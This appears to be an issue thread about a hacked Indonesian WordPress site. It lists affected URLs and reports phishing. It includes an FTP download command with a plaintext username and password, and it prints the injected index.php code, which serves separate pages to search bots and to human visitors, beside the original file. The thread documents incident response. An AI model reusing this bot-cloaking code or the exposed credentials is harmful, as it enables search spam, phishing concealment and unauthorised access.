issue web geonet.co.id di search enggine google #61

Open
opened 3 months ago by rbsetiawan · 2 comments
Collaborator
# Tag https://geonet.co.id/category/tentang/ https://geonet.co.id/tag/global-mapper/ # Category https://geonet.co.id/tag/jual-software-global-mapper/ https://geonet.co.id/category/tak-berkategori/page/8/ # Issue !! https://geonet.co.id/password-reset/ log pising - 13/04/2026
Poster
Collaborator

command download file from cpanel

curl --ftp-pasv --user 'test:geonet$123' -O ftp://gisportal.id/Download/geonet.co.id_2026-04-07_00-00-06.zip
# command download file from cpanel ``` curl --ftp-pasv --user 'test:geonet$123' -O ftp://gisportal.id/Download/geonet.co.id_2026-04-07_00-00-06.zip ```
Poster
Collaborator

backdor wordpress on index.php

<?php
/**
 * Front controller + Bot / Human detection
 * WordPress ile uyumlu
 */

// User-Agent al
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');

// BOT KONTROLÜ
$isBot = preg_match(
    '/(bot|crawl|spider|slurp|fetch|scanner|search|mediapartners|google|bing|yandex|baidu|duckduckgo|ahrefs|semrush|mj12)/i',
    $userAgent
);

if ($isBot) {

    // 🔹 BOTLAR → AMP
    if (file_exists(__DIR__ . '/amp.php')) {
        include __DIR__ . '/amp.php';
        exit;
    }

} else {

    // 🔹 İNSANLAR → NORMAL SAYFA (istersen sudhanwa.php)
    if (file_exists(__DIR__ . '/sudhanwa.php')) {
        include __DIR__ . '/sudhanwa.php';
        exit;
    }

}

/**
 * ⬇️ FALLBACK
 * Eğer yukarıdakiler çalışmazsa WordPress devreye girer
 */

💯

Original file

<?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
# backdor wordpress on index.php ``` <?php /** * Front controller + Bot / Human detection * WordPress ile uyumlu */ // User-Agent al $userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); // BOT KONTROLÜ $isBot = preg_match( '/(bot|crawl|spider|slurp|fetch|scanner|search|mediapartners|google|bing|yandex|baidu|duckduckgo|ahrefs|semrush|mj12)/i', $userAgent ); if ($isBot) { // 🔹 BOTLAR → AMP if (file_exists(__DIR__ . '/amp.php')) { include __DIR__ . '/amp.php'; exit; } } else { // 🔹 İNSANLAR → NORMAL SAYFA (istersen sudhanwa.php) if (file_exists(__DIR__ . '/sudhanwa.php')) { include __DIR__ . '/sudhanwa.php'; exit; } } /** * ⬇️ FALLBACK * Eğer yukarıdakiler çalışmazsa WordPress devreye girer */ ``` 💯 # Original file ``` <?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php'; ```
Sign in to join this conversation.
No Milestone
No project
No Assignees
1 Participants
Notifications
Due Date

No due date set.

Dependencies

This issue currently doesn't have any dependencies.

Loading…
There is no content yet.